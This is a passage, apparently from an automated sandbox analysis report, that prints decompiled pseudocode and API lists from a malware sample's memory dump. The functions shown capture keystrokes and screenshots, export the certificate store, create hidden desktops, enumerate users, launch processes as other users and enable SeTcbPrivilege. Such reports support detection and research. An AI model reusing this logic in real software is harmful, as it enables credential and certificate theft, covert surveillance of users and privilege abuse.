										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0041745A( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E00411A47( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E004117C9( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E00410672(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0040AFC2( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E0040B0EF( &_v608, _t109, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E00410672(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0040AFC2(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x0040b8d1
0x0040b8d9
0x0040b8dc
0x0040b8ea
0x0040b8ee
0x0040b98b
0x00000000
0x0040b8f4
0x0040b8f4
0x0040b8fc
0x0040b905
0x0040b90d
0x0040b912
0x0040b913
0x0040b919
0x0040b91a
0x0040b926
0x0040b928
0x0040b936
0x0040b93e
0x0040b940
0x0040b946
0x0040b94c
0x0040b961
0x0040b966
0x0040b970
0x0040b976
0x0040b97b
0x0040b97b
0x0040b961
0x0040b93e
0x0040b926
0x0040b980
0x0040b989
0x0040b992
0x0040b995
0x0040b998
0x0040b99d
0x0040b9b3
0x0040b9b6
0x0040b9bc
0x0040b9bf
0x0040b9c1
0x0040b9ce
0x0040b9ce
0x0040b9d1
0x00000000
0x00000000
0x0040b9d7
0x0040b9d9
0x0040b9dc
0x0040ba98
0x0040ba9b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b9e2
0x0040b9e2
0x0040b9ef
0x0040b9f5
0x0040b9f7
0x0040b9fd
0x0040ba00
0x0040ba02
0x0040ba08
0x0040ba12
0x0040ba17
0x0040ba19
0x0040ba29
0x0040ba2e
0x0040ba30
0x0040ba39
0x0040ba3e
0x0040ba40
0x0040ba59
0x0040ba5b
0x0040ba6b
0x0040ba6d
0x0040ba7c
0x0040ba80
0x0040ba80
0x0040ba6d
0x0040ba5b
0x0040ba40
0x0040ba30
0x0040ba88
0x0040ba88
0x0040ba02
0x0040ba8e
0x0040ba8f
0x0040ba8f
0x00000000
0x0040b9e2
0x0040b9c3
0x0040b9c8
0x00000000
0x00000000
0x00000000
0x0040baa1
0x0040baa1
0x0040baa1
0x0040baae
0x0040babf
0x0040bac5
0x0040bac7
0x0040bae0
0x0040bae2
0x0040baed
0x0040baf2
0x0040baf4
0x0040baf6
0x0040baf6
0x0040baf4
0x0040bae2
0x00000000
0x0040bafa
0x00000000
0x0040b989

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040B8E4
GetProcAddress.KERNEL32(00000000,?), ref: 0040B905
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040B936
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040B959
FreeLibrary.KERNEL32(00000000), ref: 0040B980
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0040B9B6
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040B9EF
NetApiBufferFree.NETAPI32(?,?,?), ref: 0040BA88
NetApiBufferFree.NETAPI32(?), ref: 0040BA9B
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040BABF

Strings

.exe, xrefs: 0040B998, 0040BA44, 0040BACB

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: 28af29929c37e48d46f0b592255cd30508a729fffb91e0edafbf8da08eb732f6
Instruction ID: 810bd5c617e1d4f916ef71f496c16c6fe06ccf2f9563f8eafb0e38ecd682ff66
Opcode Fuzzy Hash: 28af29929c37e48d46f0b592255cd30508a729fffb91e0edafbf8da08eb732f6
Instruction Fuzzy Hash: F16161B1900219AFDF10DBA4CC85EEE77BCEB45300F1041BAFA51F2191E7799A458B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAE4, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040DAE4(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E0040C275( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x0040daf2
0x0040daf5
0x0040dafb
0x0040db00
0x0040db1e
0x0040db20
0x0040db22
0x0040db27
0x0040db35
0x0040db36
0x0040db3c
0x0040db3d
0x0040db44
0x0040db46
0x0040db46
0x0040db4b
0x0040db4f
0x0040db58
0x0040db5d
0x0040db60
0x0040db63
0x0040db68
0x0040db6a
0x0040db6a
0x0040db7c
0x0040db99
0x0040dba4
0x0040dba9
0x0040dbae
0x0040dbae
0x0040dbb5
0x0040dbba
0x0040dbba
0x0040dbb5
0x0040dbc0
0x0040dbc7
0x0040dbce

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 0040DAF5
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040DB14
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040DB20
CreateProcessAsUserW.ADVAPI32(?,00000000,0040B0D2,00000000,00000000,00000000,0040B0D2,0040B0D2,00000000,?,?,?,00000000,00000044), ref: 0040DB91
CloseHandle.KERNEL32(?), ref: 0040DBA4
CloseHandle.KERNEL32(?), ref: 0040DBA9
FreeLibrary.KERNEL32(?), ref: 0040DBC0

Strings

CreateEnvironmentBlock, xrefs: 0040DB0E
DestroyEnvironmentBlock, xrefs: 0040DB16
userenv.dll, xrefs: 0040DAED

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 2834c3fb17eb2d6f4ddc8b917e2a142535ab476aae0f40bdbe87a5a39a1e05af
Instruction ID: f95e14c7cc715fe8d333727ee96610ab2e80e7a1872c68550967ef2049c4b714
Opcode Fuzzy Hash: 2834c3fb17eb2d6f4ddc8b917e2a142535ab476aae0f40bdbe87a5a39a1e05af
Instruction Fuzzy Hash: 7421F8B2D0021DABDF109FE5CC84DAEBBB8EF48344B10857AE511B21A0D6799E49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2BA, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A2BA(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E004128DB(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E0040A292(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E004128DB(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0040A24D(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E0040A292(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x0040a2ba
0x0040a2c5
0x0040a2cd
0x0040a2d0
0x0040a2df
0x0040a2e5
0x0040a2ea
0x0040a303
0x0040a30c
0x0040a316
0x0040a3a1
0x0040a3a4
0x0040a3aa
0x0040a3b1
0x0040a3b1
0x0040a31c
0x0040a31f
0x0040a324
0x0040a326
0x0040a329
0x0040a333
0x0040a333
0x0040a344
0x0040a348
0x0040a35e
0x0040a374
0x0040a384
0x0040a384
0x0040a388
0x0040a389
0x0040a392
0x00000000
0x00000000
0x00000000
0x0040a392
0x0040a377
0x0040a37d
0x0040a382
0x00000000
0x00000000
0x00000000
0x0040a34a
0x0040a358
0x0040a35a
0x0040a35c
0x0040a394
0x0040a394
0x0040a397
0x0040a39c
0x0040a39c
0x00000000
0x0040a397
0x00000000
0x0040a35c
0x0040a348
0x0040a2f2
0x0040a2f8
0x0040a2fb
0x0040a2fd
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32 ref: 0040A2DF
CreateWindowStationW.USER32 ref: 0040A2F2
GetProcessWindowStation.USER32 ref: 0040A303
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040A33E
CreateDesktopW.USER32 ref: 0040A352
GetCurrentThreadId.KERNEL32 ref: 0040A35E
GetThreadDesktop.USER32(00000000), ref: 0040A365
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040A377
CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040A389
CloseWindowStation.USER32(?,?), ref: 0040A3A4

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: c95242f53e9d199ab307d43e8fe81ec9bf3c7e6ead32650eb1d2d2ebc124f542
Instruction ID: ce33420c460d4fc203bb69d98e577db3c4286264679efe3640b810355b57522c
Opcode Fuzzy Hash: c95242f53e9d199ab307d43e8fe81ec9bf3c7e6ead32650eb1d2d2ebc124f542
Instruction Fuzzy Hash: 9B214A75800358BFEF10ABA59D8899E7FA8EB45388F00417AFC01F3260D6398D558B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409FCC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409FCC(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t25;
				signed int _t27;
				signed int _t32;
				void* _t36;
				intOrPtr _t39;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E004132A1() == 0) {
					L20:
					return TranslateMessage(_t54);
				} else {
					_t25 = _t54->message;
					if(_t25 != 0x201) {
						__eflags = _t25 - 0x100;
						if(_t25 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t27 = GetKeyboardState( &_v780);
						__eflags = _t27;
						if(_t27 == 0) {
							goto L20;
						}
						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t32;
						if(_t32 <= 0) {
							goto L20;
						}
						__eflags = _t32 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
								_push( &_v884);
								L19:
								E00409E2F();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x4017b0);
						goto L19;
					}
					EnterCriticalSection(0x422988);
					if( *0x422980 > 0) {
						 *0x422980 =  *0x422980 + 0xffff;
						_t36 = 2;
						E004128DB(_t36,  &_v864);
						_t39 = E0040BC07( &_v864, 0x1e, 0x1f4);
						_v900 = _t39;
						if(_t39 != 0) {
							E004128DB(0,  &_v840);
							_t65 =  &_v884;
							E004128DB(1, _t65);
							_t45 =  *0x4228ac; // 0x0
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E0040CEB5( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E0040939C(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423b10, GetTickCount());
						}
					}
					LeaveCriticalSection(0x422988);
					goto L20;
				}
			}

0x00409fd2
0x00409fd9
0x00409fe0
0x0040a122
0x0040a12f
0x00409ff3
0x00409ff3
0x00409ffb
0x0040a0b1
0x0040a0b6
0x00000000
0x00000000
0x0040a0b8
0x0040a0bc
0x00000000
0x00000000
0x0040a0c3
0x0040a0c9
0x0040a0cb
0x00000000
0x00000000
0x0040a0eb
0x0040a0f1
0x0040a0f3
0x00000000
0x00000000
0x0040a0f5
0x0040a0f8
0x0040a107
0x0040a111
0x0040a111
0x0040a113
0x0040a11c
0x0040a11d
0x0040a11d
0x00000000
0x0040a11d
0x0040a109
0x0040a109
0x0040a10f
0x00000000
0x00000000
0x00000000
0x0040a10f
0x0040a0fa
0x0040a0fe
0x00000000
0x00000000
0x0040a100
0x00000000
0x0040a100
0x0040a006
0x0040a014
0x0040a01f
0x0040a02c
0x0040a02d
0x0040a03c
0x0040a041
0x0040a047
0x0040a04f
0x0040a056
0x0040a05b
0x0040a060
0x0040a067
0x0040a069
0x0040a069
0x0040a08a
0x0040a08f
0x0040a099
0x0040a0a1
0x0040a0a1
0x0040a047
0x0040a0a9
0x00000000
0x0040a0a9

APIs

TranslateMessage.USER32(?), ref: 0040A123

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,0041A960,19367401,00000001), ref: 004132A9

EnterCriticalSection.KERNEL32(00422988), ref: 0040A006
LeaveCriticalSection.KERNEL32(00422988), ref: 0040A0A9

Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040BC39
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040BC4A
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040BC57
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040BC64
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040BC71
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040BC7E
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040BC8B
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040BC98
Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040BCE0
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040BCEB
Part of subcall function 0040BC07: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040BCFD
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040BD08
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040BD14
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040BD21
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040BD2E
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040BD3B
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040BD48
Part of subcall function 0040BC07: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040BD55

GetTickCount.KERNEL32 ref: 0040A06B
GetKeyboardState.USER32(?), ref: 0040A0C3
ToUnicode.USER32 ref: 0040A0EB

Strings

, xrefs: 0040A109

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
String ID:
API String ID: 2762424063-3916222277
Opcode ID: 230519dcdb3d7879d25143d2751b6cd7e0f0f6bc34fcb492d73e3fbad88a13db
Instruction ID: 22c010f7900b1c5b61657829600c43c232689f779824a798694b1c8c7b05aba1
Opcode Fuzzy Hash: 230519dcdb3d7879d25143d2751b6cd7e0f0f6bc34fcb492d73e3fbad88a13db
Instruction Fuzzy Hash: 2231C23160030597DB20AF64CD49A9B77A8EF40304F44493BF941FB1E2D778DCA587AA

Uniqueness

Uniqueness Score: -1.00%

Function 004099A9, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,0040179C), ref: 004099C4
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004099E0
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 004099EC
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00409A2B
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00409A5B
CharLowerW.USER32 ref: 00409A79
GetSystemTime.KERNEL32(?), ref: 00409A84
CertCloseStore.CRYPT32(?,00000000), ref: 00409B0D

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: a925ade07382007ca797c4ad575b6858f029d54df0611276f709669e005de632
Instruction ID: 55c2a5e20a59fdd798a6655f09e320bdbc50a2022aaa17f5d3d291103c9e517f
Opcode Fuzzy Hash: a925ade07382007ca797c4ad575b6858f029d54df0611276f709669e005de632
Instruction Fuzzy Hash: 5441A571208345ABD711AF65CC81AABBBECAB88354F00093FF584F31E1D678DD498B66

Uniqueness

Uniqueness Score: -1.00%

Function 004118EB, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004118EB(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E00411A47("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0041164C( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00411A47( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E004118EB( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x00411908
0x0041190c
0x00411910
0x00411917
0x00411a3e
0x00411a44
0x00411a44
0x0041192a
0x00411930
0x00411937
0x0041193d
0x00411946
0x00411946
0x0041194b
0x00000000
0x00000000
0x0041196d
0x00411a1d
0x00411a2e
0x00000000
0x00000000
0x00000000
0x00411a2e
0x00411977
0x0041197a
0x00411983
0x00000000
0x00000000
0x00000000
0x00000000
0x0041198a
0x0041198a
0x0041198d
0x004119ca
0x004119cf
0x004119ef
0x004119f3
0x004119f8
0x004119f8
0x00411a18
0x00411a18
0x00000000
0x004119cf
0x0041198f
0x004119a5
0x004119a9
0x00000000
0x00000000
0x00000000
0x004119ab
0x004119b8
0x004119bb
0x004119bd
0x00000000
0x00000000
0x004119bf
0x004119c3
0x004119c8
0x004119c8
0x00000000
0x004119c3
0x0041197a
0x00411a38
0x00411a38

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 004119C8
Sleep.KERNEL32(00000000,?,?), ref: 004119F8
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: a70d2b9397a6aa42eec9135431d11a7fafad4018ef51344d77a2d37dcbde4672
Instruction ID: 98a781d7fcfd1f00f905ab67deadc3c59524c08d9a8bc59ebf1f9e6a56046893
Opcode Fuzzy Hash: a70d2b9397a6aa42eec9135431d11a7fafad4018ef51344d77a2d37dcbde4672
Instruction Fuzzy Hash: 75418FB111524A9BCB21DF10D948BDF7BA9FF44384F04452AFAA4922B1D339C895CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D88E, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D88E(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x0040d899
0x0040d8ad
0x0040d8cc
0x0040d8d4
0x0040d8e3
0x0040d904
0x0040d904
0x0040d909
0x00000000
0x0040d8c1
0x00000000
0x0040d8c1

APIs

GetCurrentThread.KERNEL32 ref: 0040D89E
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8A5
OpenProcessToken.ADVAPI32(000000FF,00000020,0040B17E,?,?,?,?,0040B17E,SeTcbPrivilege), ref: 0040D8B7
LookupPrivilegeValueW.ADVAPI32(00000000,0040B17E,?), ref: 0040D8DB
AdjustTokenPrivileges.ADVAPI32(0040B17E,00000000,00000001,00000000,00000000,00000000), ref: 0040D8F0
GetLastError.KERNEL32 ref: 0040D8FA
CloseHandle.KERNEL32(0040B17E), ref: 0040D909

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: e692fafd4a155bcc7da70bb7f7ef57e07b8e5f707f6f61df9d4d58501e8cacb8
Instruction ID: fa1c77d367ea522f5039c883b6656c3056721d2891ccb828fc2d957eea6e9de3
Opcode Fuzzy Hash: e692fafd4a155bcc7da70bb7f7ef57e07b8e5f707f6f61df9d4d58501e8cacb8
Instruction Fuzzy Hash: 1A01E9B1A00208BFEB109FE19D89AEF7BACEB14355F004176F611F11A0E77499989A29

Uniqueness

Uniqueness Score: -1.00%

Function 0040D467, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00411A8E,00000000,00000000,00000001,F0000040,00000000,00411A8E,?,00000030,?,?,?,00411FA7,?), ref: 0040D480
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00411FA7,?), ref: 0040D498
CryptHashData.ADVAPI32(?,00000010), ref: 0040D4B4
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040D4CC
CryptDestroyHash.ADVAPI32(?), ref: 0040D4E3
CryptReleaseContext.ADVAPI32(?,00000000,?,?,00411FA7,?), ref: 0040D4ED

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
Instruction ID: c2743722f4b84324cf3778a1a33c2de62d715b4bddb92c351fd4a050cc7a2b01
Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
